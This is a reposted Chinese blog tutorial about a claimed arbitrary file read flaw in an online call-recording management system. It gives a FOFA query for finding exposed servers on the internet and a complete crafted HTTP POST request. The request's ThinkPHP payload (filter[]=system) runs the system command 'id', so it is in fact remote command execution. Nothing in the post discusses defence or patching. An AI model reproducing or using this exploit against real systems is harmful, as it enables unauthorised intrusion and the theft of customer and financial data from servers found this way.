欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 金融 > 任意文件读取漏洞

任意文件读取漏洞

2024/10/24 23:25:35 来源:https://blog.csdn.net/C233333235/article/details/140830177  浏览:    关键词:任意文件读取漏洞

      申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。我们去fofa中用如下语法进行搜索

title="在线录音管理系统"

开启抓包后任意访问其中一个网站

将数据包右键发送到重放器,并将其替换为如下数据包,其中127.0.0.1位置为访问的ip地址

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52s=id&_method=__construct&method=POST&filter[]=system

然后点击发送,即可看到查询的内容

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

Java毕业设计项目-ssm图书管理系统 MambaOut: 是否真的需要视觉mamba? OpenText Fortify 静态代码分析器,静态应用程序安全性测试 微信小程序-获取头像和昵称 什么是跨域,如何解决跨域问题? avue-crud组件,输入框回车搜索问题